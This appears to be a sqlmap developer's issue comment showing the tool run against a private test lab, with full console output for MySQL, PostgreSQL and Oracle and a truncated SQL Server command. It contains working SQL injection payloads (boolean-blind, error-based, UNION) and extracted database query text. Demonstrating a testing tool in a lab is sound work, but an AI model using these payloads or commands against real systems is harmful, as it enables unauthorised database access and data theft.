stamparm
commented
9 years ago Against our testing environment:
MySQL:
python sqlmap.py -u "http://172.16.93.131/sqlmap/mysql/get_int.php?id=1" -z "ign,flu,bat,tec=BEU" --sql-query="Select info from information_schema.processlist"
[11:45:20] [WARNING] detected ambiguity (mnemonic 'ign' can be resolved to: 'ignore-401', 'ignore-proxy'). Resolved to shortest of those ('ignore-401')
_
___ ___| |_____ ___ ___ {1.0-dev-03f32ae}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:45:20
[11:45:20] [INFO] flushing session file
[11:45:20] [INFO] testing connection to the target URL
[11:45:21] [INFO] heuristics detected web page charset 'ascii'
[11:45:21] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:45:22] [INFO] target URL is stable
[11:45:22] [INFO] testing if GET parameter 'id' is dynamic
[11:45:22] [INFO] confirming that GET parameter 'id' is dynamic
[11:45:22] [INFO] GET parameter 'id' is dynamic
[11:45:22] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:45:22] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[11:45:22] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[11:45:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:45:22] [WARNING] reflective value(s) found and filtering out
[11:45:22] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:45:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:45:22] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[11:45:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:45:22] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:45:22] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:45:22] [INFO] target URL appears to have 3 columns in query
[11:45:22] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 16 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 3648=3648
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1 AND (SELECT 4021 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(4021=4021,1))),0x7162767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x7171717871,0x6a6f45726b544c4e784f,0x7162767671),NULL,NULL--
---
[11:45:22] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[11:45:22] [INFO] fetching SQL SELECT statement query output: 'Select info from information_schema.processlist'
Select info from information_schema.processlist [2]:
[*]
[*] SELECT * FROM users WHERE id=__REFLECTED_VALUE__ LIMIT 0, 1
[11:45:22] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/172.16.93.131'
[*] shutting down at 11:45:22PostgreSQL:
python sqlmap.py -u "http://172.16.93.131/sqlmap/pgsql/get_int.php?id=1" -z "ign,flu,bat,tec=BEU" --sql-query="Select current_query from pg_stat_activity"
[11:45:58] [WARNING] detected ambiguity (mnemonic 'ign' can be resolved to: 'ignore-401', 'ignore-proxy'). Resolved to shortest of those ('ignore-401')
_
___ ___| |_____ ___ ___ {1.0-dev-03f32ae}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:45:58
[11:45:58] [INFO] flushing session file
[11:45:58] [INFO] testing connection to the target URL
[11:45:58] [INFO] heuristics detected web page charset 'ascii'
[11:45:59] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:46:00] [INFO] target URL is stable
[11:46:00] [INFO] testing if GET parameter 'id' is dynamic
[11:46:00] [INFO] confirming that GET parameter 'id' is dynamic
[11:46:00] [WARNING] GET parameter 'id' does not appear dynamic
[11:46:00] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'PostgreSQL')
[11:46:00] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[11:46:00] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] Y
[11:46:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:46:00] [WARNING] reflective value(s) found and filtering out
[11:46:00] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:46:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:46:00] [INFO] GET parameter 'id' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[11:46:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:46:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:46:00] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:46:00] [INFO] target URL appears to have 3 columns in query
[11:46:00] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 16 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9460=9460
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: id=1 AND 2639=CAST((CHR(113)||CHR(120)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (2639=2639) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(122)||CHR(106)||CHR(113)) AS NUMERIC)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,(CHR(113)||CHR(120)||CHR(122)||CHR(98)||CHR(113))||(CHR(118)||CHR(122)||CHR(102)||CHR(100)||CHR(71)||CHR(77)||CHR(76)||CHR(80)||CHR(99)||CHR(119))||(CHR(113)||CHR(120)||CHR(122)||CHR(106)||CHR(113)),NULL--
---
[11:46:00] [INFO] the back-end DBMS is PostgreSQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[11:46:00] [INFO] fetching SQL SELECT statement query output: 'Select current_query from pg_stat_activity'
Select current_query from pg_stat_activity [2]:
[*] <IDLE>
[*] SELECT * FROM users WHERE id=__REFLECTED_VALUE__ OFFSET 0 LIMIT 1
[11:46:00] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/172.16.93.131'
[*] shutting down at 11:46:00Oracle:
python sqlmap.py -u "http://172.16.93.131/sqlmap/oracle/get_int.php?id=1" -z "ign,flu,bat,tec=BEU" --sql-query="select SQL_TEXT from v$sql"
[11:46:42] [WARNING] detected ambiguity (mnemonic 'ign' can be resolved to: 'ignore-401', 'ignore-proxy'). Resolved to shortest of those ('ignore-401')
_
___ ___| |_____ ___ ___ {1.0-dev-03f32ae}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:46:42
[11:46:42] [INFO] flushing session file
[11:46:42] [INFO] testing connection to the target URL
[11:46:42] [INFO] heuristics detected web page charset 'ascii'
[11:46:42] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:46:44] [INFO] target URL is stable
[11:46:44] [INFO] testing if GET parameter 'id' is dynamic
[11:46:44] [INFO] confirming that GET parameter 'id' is dynamic
[11:46:44] [INFO] GET parameter 'id' is dynamic
[11:46:44] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'Oracle')
[11:46:44] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n] Y
[11:46:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:46:44] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:46:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:46:44] [INFO] GET parameter 'id' is 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' injectable
[11:46:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:46:44] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:46:44] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:46:44] [INFO] target URL appears to have 3 columns in query
[11:46:44] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 17 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9249=9249
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=1 AND 6946=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (6946=6946) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||CHR(90)||CHR(68)||CHR(118)||CHR(120)||CHR(81)||CHR(78)||CHR(107)||CHR(88)||CHR(79)||CHR(102)||CHR(113)||CHR(118)||CHR(122)||CHR(112)||CHR(113),NULL FROM DUAL--
---
[11:46:44] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
[11:46:44] [INFO] fetching SQL SELECT statement query output: 'select SQL_TEXT from v'
[11:46:44] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[11:46:44] [WARNING] the SQL query provided does not return any output
[11:46:45] [WARNING] the SQL query provided does not return any output
[11:46:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
select SQL_TEXT from v: None
[11:46:45] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/172.16.93.131'
[*] shutting down at 11:46:45
stamparm@Laptop:~/Dropbox/Work/sqlmap$ python sqlmap.py -u "http://172.16.93.131/sqlmap/oracle/get_int.php?id=1" -z "ign,flu,bat,tec=BEU" --sql-query='select SQL_TEXT from v$sql'
[11:47:02] [WARNING] detected ambiguity (mnemonic 'ign' can be resolved to: 'ignore-401', 'ignore-proxy'). Resolved to shortest of those ('ignore-401')
_
___ ___| |_____ ___ ___ {1.0-dev-03f32ae}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:47:02
[11:47:02] [INFO] flushing session file
[11:47:02] [INFO] testing connection to the target URL
[11:47:03] [INFO] heuristics detected web page charset 'ascii'
[11:47:03] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:47:04] [INFO] target URL is stable
[11:47:04] [INFO] testing if GET parameter 'id' is dynamic
[11:47:04] [INFO] confirming that GET parameter 'id' is dynamic
[11:47:04] [INFO] GET parameter 'id' is dynamic
[11:47:04] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'Oracle')
[11:47:04] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n] Y
[11:47:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:47:04] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:47:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:47:04] [INFO] GET parameter 'id' is 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' injectable
[11:47:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:47:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:47:04] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:47:04] [INFO] target URL appears to have 3 columns in query
[11:47:04] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 17 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 4132=4132
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=1 AND 4302=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (4302=4302) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(98)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(118)||CHR(120)||CHR(113)||CHR(71)||CHR(66)||CHR(118)||CHR(99)||CHR(72)||CHR(122)||CHR(97)||CHR(76)||CHR(74)||CHR(109)||CHR(113)||CHR(122)||CHR(98)||CHR(118)||CHR(113),NULL FROM DUAL--
---
[11:47:05] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
[11:47:05] [INFO] fetching SQL SELECT statement query output: 'select SQL_TEXT from v$sql'
[11:47:05] [WARNING] reflective value(s) found and filtering out
select SQL_TEXT from v$sql [261]:
[*] select open_mode from v$database
[*] begin dbms_rcvman.resetAll; end;
[*] declare vsn varchar2(20); begin vsn := dbms_rcvman.getPackageVersion; :pkg_vsn:pkg_vsn_i := vsn; if vsn is not null then :pkg_vsnub4 := to_number(substr(vsn,1,2) || substr(vsn,4,2) || substr(vsn,7,2) || nvl(substr(vsn,10,2),'00')); end if; end;
[*] select name, resetlogs_time, resetlogs_change#, dbid into :dbname:dbname_i, :rlgtime, :rlgscn, :fhdbi:fhdbi_i from v$database
[*] select u.name, o.name, t.attributes from sys.type$ t, sys.user$ u, sys.obj$ o where o.owner# = u.user# AND t.toid = o.oid$ and t.toid = :1 and t.version# = :2
[*] alter session set NLS_LANGUAGE='ENGLISH' NLS_TERRITORY='UNITED KINGDOM' NLS_CURRENCY='#' NLS_ISO_CURRENCY='UNITED KINGDOM' NLS_NUMERIC_CHARACTERS='.,' NLS_DATE_FORMAT='DD-MON-RR' NLS_DATE_LANGUAGE='ENGLISH' NLS_SORT='BINARY'
[*] ALTER SESSION SET TIME_ZONE='+00:00'
[*] BEGIN dbms_ha_alerts_prvt.clear_instance_resources( :dbdomain, :dbuniquename, :instance_name, :event_time);END;
[*] CALL MGMT_ADMIN_DATA.EVALUATE_MGMT_METRICS(:tguid, :mguid, :result)
[*] DECLARE job BINARY_INTEGER := :job; next_date TIMESTAMP WITH TIME ZONE := :mydate; broken BOOLEAN := FALSE; job_name VARCHAR2(30) := :job_name; job_subname VARCHAR2(30) := :job_subname; job_owner VARCHAR2(30) := :job_owner; job_start TIMESTAMP WITH TIME ZONE := :job_start; window_start TIMESTAMP WITH TIME ZONE := :window_start; window_end TIMESTAMP WITH TIME ZONE := :window_end; BEGIN begin dbms_rlmgr_dr.execschdactions('RLM$SCHDNEGACTION'); end; :mydate := next_date; IF broken THEN :b := 1; ELSE :b := 0; END IF; END;
[*] DECLARE job BINARY_INTEGER := :job; next_date DATE := :mydate; broken BOOLEAN := FALSE; BEGIN EMD_MAINTENANCE.EXECUTE_EM_DBMS_JOB_PROCS(); :mydate := next_date; IF broken THEN :b := 1; ELSE :b := 0; END IF; END;
[*] delete from "SYS"."ALERT_QT" where rowid = :1
[*] delete from access$ where d_obj#=:1
[*] delete from dependency$ where d_obj#=:1
[*] DELETE FROM MGMT_JOB_EMD_STATUS_QUEUE
[*] DELETE FROM RECENT_RESOURCE_INCARNATIONS$ WHERE DB_UNIQUE_NAME <> :B2 OR DB_DOMAIN <> :B1
[*] DELETE FROM RECENT_RESOURCE_INCARNATIONS$ WHERE RESOURCE_TYPE = 'INSTANCE' AND RESOURCE_NAME = :B4 AND DB_UNIQUE_NAME = :B3 AND DB_DOMAIN = NVL(:B2 , '==N/A==') AND STARTUP_TIME < SYS_EXTRACT_UTC(:B1 )
[*] delete from smon_scn_time where thread=0 and scn = (select min(scn) from smon_scn_time where thread=0)
[*] delete from WRI$_ALERT_OUTSTANDING where reason_id = :1 and object_id = :2 and subobject_id = :3 and internal_instance_number = :4 returning owner, object_name, subobject_name, sequence_id, error_instance_id, creation_time into :5, :6, :7, :8, :9, :10
[*] insert into "SYS"."ALERT_QT" (q_name, msgid, corrid, priority, state, delay, expiration, time_manager_info, local_order_no, chain_no, enq_time, step_no, enq_uid, enq_tid, retry_count, exception_qschema, exception_queue, recipient_key, dequeue_msgid, user_data, sender_name, sender_address, sender_protocol, user_prop, cscn, dscn) values (:1, :2, :3, :4, :5, :6, :7, :8, :9, :10, :11, :12, :13, :14, 0, :15, :16, :17, :18, :19, :20, :21, :22, :23, :24, :25)
[*] insert into access$(d_obj#,order#,columns,types) values (:1,:2,:3,:4)
[*] INSERT INTO MGMT_METRICS_RAW (TARGET_GUID, COLLECTION_TIMESTAMP, METRIC_GUID, KEY_VALUE, VALUE, STRING_VALUE) VALUES (:B5 , :B4 , :B3 , :B2 , :B1 , NULL)
[*] INSERT INTO MGMT_METRICS_RAW (TARGET_GUID, COLLECTION_TIMESTAMP, METRIC_GUID, KEY_VALUE, VALUE, STRING_VALUE) VALUES (:B5 , :B4 , :B3 , :B2 , NULL, :B1 )
[*] INSERT INTO MGMT_STRING_METRIC_HISTORY (TARGET_GUID, KEY_VALUE, COLLECTION_TIMESTAMP, METRIC_GUID, STRING_VALUE) VALUES (:B1 , :B2 , :B3 , :B4 , :B5 )
[*] INSERT INTO MGMT_SYSTEM_PERFORMANCE_LOG (JOB_NAME, TIME, DURATION, MODULE, ACTION, IS_TOTAL, NAME, VALUE, CLIENT_DATA, HOST_URL) VALUES (:B9 , SYSDATE, :B8 , SUBSTR(:B7 , 1, 512), SUBSTR(:B6 ,1,32), :B5 , SUBSTR(:B4 ,1,128), SUBSTR(:B3 ,1,128), SUBSTR(:B2 ,1,128), SUBSTR(:B1 ,1,256))
[*] INSERT INTO RECENT_RESOURCE_INCARNATIONS$ ( RESOURCE_TYPE, RESOURCE_ID, RESOURCE_NAME, DB_UNIQUE_NAME, DB_DOMAIN, INSTANCE_NAME, HOST_NAME, STARTUP_TIME, LOCATION, INCARNATION ) SELECT 'INSTANCE', INSTANCE_NUMBER, INSTANCE_NAME, :B2 , :B1 , INSTANCE_NAME, HOST_NAME, SYS_EXTRACT_UTC( DBMS_HA_ALERTS_PRVT.INSTANCE_STARTUP_TIMESTAMP_TZ(VI.STARTUP_TIME)), HOST_NAME, '==N/A==' FROM V$INSTANCE VI
[*] insert into sys.col_usage$ values ( :objn, :coln, decode(bitand(:flag,1),0,0,1), decode(bitand(:flag,2),0,0,1), decode(bitand(:flag,4),0,0,1), decode(bitand(:flag,8),0,0,1), decode(bitand(:flag,16),0,0,1), decode(bitand(:flag,32),0,0,1), :time)
[*] insert into sys.mon_mods$ values (:1, :2, :3, :4, :5, :6, :7)
[*] insert into sys.scheduler$_event_log (log_id, log_date, type#, name, owner, operation, status, user_name, client_id, guid, additional_info, class_id) values (:1, SYSTIMESTAMP, :2, :3, :4, :5, :6, :7, :8, :9, :10, :11)\x00
[*] insert into sys.scheduler$_job_run_details (log_id, log_date, req_start_date, start_date, run_duration, instance_id, session_id, slave_pid, cpu_used, error#, additional_info) values (:1, SYSTIMESTAMP, :2, :3, :4, :5, :6, :7, numtodsinterval(:8/100, 'second'), :9, :10)\x00
[*] INSERT INTO sys.wri$_adv_findings (id, task_id, type, parent, obj_id, impact_msg_id, impact_val, msg_id, more_info_id) VALUES (:1,:2,:3,:4,:5,:6,:7,:8,:9)
[*] INSERT INTO sys.wri$_adv_message_groups (task_id,id,seq,message#,fac,hdr,lm,nl,p1,p2,p3,p4,p5) VALUES (:1,:2,:3,:4,:5,:6,:7,:8,:9,:10,:11,:12,:13)
[*] insert into wrh$_waitclassmetric_history (snap_id, dbid, instance_number, wait_class_id, begin_time, end_time, intsize, group_id, average_waiter_count, dbtime_in_wait, time_waited, wait_count) select :snap_id, :dbid, :instance_number, wait_id, begtime, endtime, intsize_csec, groupid, average_waiter_count, dbtime_in_wait, time_waited, wait_count from x$kewmevmv
[*] insert into WRI$_ALERT_HISTORY (sequence_id, reason_id, owner, object_name, subobject_name, reason_argument_1, reason_argument_2, reason_argument_3, reason_argument_4, reason_argument_5, time_suggested, creation_time, action_argument_1, action_argument_2, action_argument_3, action_argument_4, action_argument_5, message_level, hosting_client_id, process_id, host_id, host_nw_addr, instance_name, instance_number, user_id, execution_context_id, error_instance_id, resolution, metric_value) values (:1, :2, :3, :4, :5, :6, :7, :8, :9, :10, :11, :12, :13, :14, :15, :16, :17, :18, :19, :20, :21, :22, :23, :24, :25, :26, :27, :28, :29)
[*] insert into WRI$_ALERT_OUTSTANDING (reason_id, object_id, subobject_id, internal_instance_number, owner, object_name, subobject_name, sequence_id, reason_argument_1, reason_argument_2, reason_argument_3, reason_argument_4, reason_argument_5, time_suggested, creation_time, action_argument_1, action_argument_2, action_argument_3, action_argument_4, action_argument_5, message_level, hosting_client_id, process_id, host_id, host_nw_addr, instance_name, instance_number, user_id, execution_context_id, error_instance_id, context, metric_value) values (:1, :2, :3, :4, :5, :6, :7, :8, :9, :10, :11, :12, :13, :14, :15, :16, :17, :18, :19, :20, :21, :22, :23, :24, :25, :26, :27, :28, :29, :30, :31, :32)
[*] LOCK TABLE RECENT_RESOURCE_INCARNATIONS$ IN EXCLUSIVE MODE
[*] lock table sys.col_usage$ in exclusive mode nowait
[*] lock table sys.mon_mods$ in exclusive mode nowait
[*] select INSTANCE_NUMBER , INSTANCE_NAME , HOST_NAME , VERSION , STARTUP_TIME , STATUS , PARALLEL , THREAD# , ARCHIVER , LOG_SWITCH_WAIT , LOGINS , SHUTDOWN_PENDING, DATABASE_STATUS, INSTANCE_ROLE, ACTIVE_STATE, BLOCKED from GV$INSTANCE where inst_id = USERENV('Instance')
[*] select SQL_TEXT , SQL_FULLTEXT , SQL_ID, SHARABLE_MEM , PERSISTENT_MEM , RUNTIME_MEM , SORTS , LOADED_VERSIONS , OPEN_VERSIONS , USERS_OPENING , FETCHES , EXECUTIONS , PX_SERVERS_EXECUTIONS , END_OF_FETCH_COUNT, USERS_EXECUTING , LOADS , FIRST_LOAD_TIME, INVALIDATIONS, PARSE_CALLS , DISK_READS , DIRECT_WRITES , BUFFER_GETS , APPLICATION_WAIT_TIME, CONCURRENCY_WAIT_TIME, CLUSTER_WAIT_TIME, USER_IO_WAIT_TIME, PLSQL_EXEC_TIME, JAVA_EXEC_TIME, ROWS_PROCESSED , COMMAND_TYPE , OPTIMIZER_MODE , OPTIMIZER_COST, OPTIMIZER_ENV, OPTIMIZER_ENV_HASH_VALUE, PARSING_USER_ID , PARSING_SCHEMA_ID , PARSING_SCHEMA_NAME, KEPT_VERSIONS , ADDRESS , TYPE_CHK_HEAP , HASH_VALUE, OLD_HASH_VALUE, PLAN_HASH_VALUE, CHILD_NUMBER, SERVICE, SERVICE_HASH, MODULE, MODULE_HASH , ACTION , ACTION_HASH , SERIALIZABLE_ABORTS , OUTLINE_CATEGORY, CPU_TIME, ELAPSED_TIME, OUTLINE_SID, CHILD_ADDRESS, SQLTYPE, REMOTE, OBJECT_STATUS, LITERAL_HASH_VALUE, LAST_LOAD_TIME, IS_OBSOLETE, CHILD_LATCH, SQL_PROFILE, PROGRAM_ID, PROGRAM_
[*] select tab.rowid, tab.msgid, tab.corrid, tab.priority, tab.delay, tab.expiration, tab.retry_count, tab.exception_qschema, tab.exception_queue, tab.chain_no, tab.local_order_no, tab.enq_time, tab.time_manager_info, tab.state, tab.enq_tid, tab.step_no, tab.sender_name, tab.sender_address, tab.sender_protocol, tab.dequeue_msgid, tab.user_prop, tab.user_data from "SYS"."ALERT_QT" tab where msgid = :1
[*] SELECT * FROM scott.users WHERE id=1
[*] SELECT * FROM scott.users WHERE id=1 AND 4132=4132
[*] SELECT * FROM scott.users WHERE id=1 AND 4302=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (4302=4302) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(98)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
[*] SELECT * FROM scott.users WHERE id=1 AND 4306=7777
[*] SELECT * FROM scott.users WHERE id=1 AND 4441=4600
[*] SELECT * FROM scott.users WHERE id=1 AND 4832=7755
[*] SELECT * FROM scott.users WHERE id=1 AND 6946=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (6946=6946) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)
[*] SELECT * FROM scott.users WHERE id=1 AND 9249=9249
[*] SELECT * FROM scott.users WHERE id=1 AND 9333=1035
[*] SELECT * FROM scott.users WHERE id=1 ORDER BY 1--
[*] SELECT * FROM scott.users WHERE id=1 ORDER BY 3--
[*] SELECT * FROM scott.users WHERE id=1 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (4475= 4475) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(98)||CHR(118)||CHR(113),NULL FROM DUAL--
[*] SELECT * FROM scott.users WHERE id=1 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(118)||CHR(120)||CHR(113)||CHR(71)||CHR(66)||CHR(118)||CHR(99)||CHR(72)||CHR(122)||CHR(97)||CHR(76)||CHR(74)||CHR(109)||CHR(113)||CHR(122)||CHR(98)||CHR(118)||CHR(113),NULL FROM DUAL UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(118)||CHR(120)||CHR(113)||CHR(70)||CHR(103)||CHR(68)||CHR(111)||CHR(110)||CHR(110)||CHR(83)||CHR(65)||CHR(105)||CHR(104)||CHR(113)||CHR(122)||CHR(98)||CHR(118)||CHR(113),NULL FROM DUAL--
[*] SELECT * FROM scott.users WHERE id=1 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(118)||CHR(120)||CHR(113)||CHR(71)||CHR(66)||CHR(118)||CHR(99)||CHR(72)||CHR(122)||CHR(97)||CHR(76)||CHR(74)||CHR(109)||CHR(113)||CHR(122)||CHR(98)||CHR(118)||CHR(113),NULL FROM DUAL--
[*] SELECT * FROM scott.users WHERE id=1 UNION ALL SELECT NULL,CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1064= 1064) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(112)||CHR(113),NULL FROM DUAL--
...Microsoft SQL Server:
python sqlmap.py -u "http://172.16.93.132/sqlmap/mssql/iis/get_int.asp?id=1" -z "ign,flu,bat,tec=BEU" --sql-query='SELECT st.text from sys.dm_exec_cached_plans cp cross apply sys.dm_exec_sql_text(cp.plan_handle) st'
